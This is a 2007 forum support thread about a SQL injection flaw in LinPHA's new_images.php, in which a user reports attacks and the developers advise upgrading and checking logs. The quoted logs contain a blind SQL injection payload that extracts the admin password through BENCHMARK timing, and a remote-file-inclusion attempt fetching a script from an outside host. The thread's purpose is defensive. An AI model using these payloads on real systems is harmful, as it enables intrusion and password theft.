LinPHA New_images.PHP SQL Injection Vulnerabi
Status: Inactive
Brought to you by:
bzrudi
Menu
▾
▴
Hi,
my database gets flooded with this crap, any idea when we can hope for a patch ?
http://www.securityfocus.com/bid/25119
thx alot!
am I the only one gettings this, this seems to be a security issue found by securityfocus, noboday cares ?
strange.
best regards
hhmmmm I guess you didn't notice the new release that fixed that bug???
1.3.2 on 10/08/2007
you mean the release from today, which i didnt notice 2 days ago ?
damn me im so stupid :-)
thx for the update!
no I simply meant the release released before your second post.
BTW, thank you for bringing this security flaw to our attention :)
Hi,
well I got the same injections , i instaled 1.3.2, I copied all files execept SQL and the other dir mentioned in docs, dont remember which atm.
I even reloaded apache, altho I guess its not necessary...
any ideas ?
thx alot!
and you are _really_ you have replaced at least the file functions\db_api.php?
flo
Hey,
if one is using the exploit there is not much that we can do. The thing is, that the exploit just doesn't work anymore with 1.3.2. But you can't prevent one from using the exploit, even against a 1.3.2
cheers bzrudi
huh I dont understand, the exploit is not working anymore, so what would it matter if one would try using it ?
Looks to me I upgraded fine and the exploit is still working....see my other post.
greetings!
how do you know that the exploit is still working?
what happens exactly?
you are sure you have changed your passwords?
flo
password ? I didnt know I have to change any, sorry if I missed that in docs!
Which ones I need to change, linpha passwords and/or mysql password ?
thx !
please also answer the other questions!
if someone breaks into my server i would always change my passwords
if they could get the linpha admin password, they can do almost everything on the server with the integrated filemanager
flo
no they can only access anything apache can access if im not wrong...
You are right, but one might use the filemanager to upload some other files to LinPHA and use them to do other things ;-)
So what did the mysql logs say in detail?
Thanks!
cheers bzrudi
exactly
they may have uploaded an own php filemanager which can access now all files apache can access
flo
hmm apache can only access a few dirs and only write into log dirs and /tmp, I have now changed the linpha users passwords, lets see what happens, I have seen this in messages:
Aug 8 19:19:49 zer09 httpd: LinPHA DATABASE | ERROR | 20070808 191949 | 212.241.197.108 | mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'://212.241.197.108/remot.txt?\' at line 1] in EXECUTE(\"SELECT linpha_photos.id AS id, linph...
looks like somone tried to execute a statement.
I havent found any successfull execution of a mysql statement in the log...
and whats in your apache access logs?
i would look through every php file in your htdocs
it could be anywhere
if you want be 100% sure that your server is clean you have to format the hard drives, reinstall and restore a backup
flo
I found this: access_log:41.251.3.17 - - [31/Jul/2007:00:35:37 +0200] "GET /new_images.php?order=id,(SELECT/**/password/**/FROM/**/linpha_users/**/WHERE/**/id=1/**/OR/**/RAND(IF((ORD(SUBSTRING(password,1,1))=102),BENCHMARK(1000000,MD5(1)),1))) HTTP/1.1" 200 688
damn I got like 30 vhosts on the server and tons of other services...rebuilding it would be nuts :-)
Hey,
ok this one is from the exploit. BUT - I ran this exploit against three LinPHA installations many times without one success. So it does not necessarily mean that one got the LinPHA admin pass. I would recommend to watch for obvious files in your webroot and install a rootkit checker like rkhunter, watch traffic and logs. Enable LinPHA logging and watch for suspicious admin logins.
cheers bzrudi
hismanio,
the exploit you mentioned tries to get the LinPHA admin user password. The line you posted has absolutely nothing to do with that exploit. The line posted, tries a remote code execution.
Check your logs for the word "BENCHMARK", this is what is used in querys by the exploit.
cheers bzrudi
pretty sure I copied new version:
[root@zer09 functions]# ls -l
total 180
-rw-r--r-- 1 1000 1000 63688 Aug 10 14:14 db_api.php
-rw-r--r-- 1 1000 1000 14135 Aug 10 14:14 filesys.php
-rw-r--r-- 1 1000 1000 2882 Aug 10 14:14 functions.php
-rw-r--r-- 1 1000 1000 12736 Aug 10 14:14 identify.php
-rw-r--r-- 1 1000 1000 26746 Aug 10 14:14 image.php
-rw-r--r-- 1 1000 1000 48543 Aug 10 14:14 other.php
[root@zer09 functions]# md5sum db_api.php
9fcdaafd5c6431c46e10f182b42e48b8 db_api.php